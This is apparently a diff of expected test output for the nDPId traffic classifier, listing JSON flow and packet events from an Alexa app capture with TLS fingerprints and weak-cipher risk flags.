-01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"} 
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"} 
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976044219,"flow_last_seen":1490976046417,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":6417,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976044488,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":4402,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976044502,"flow_last_seen":1490976046415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976044509,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 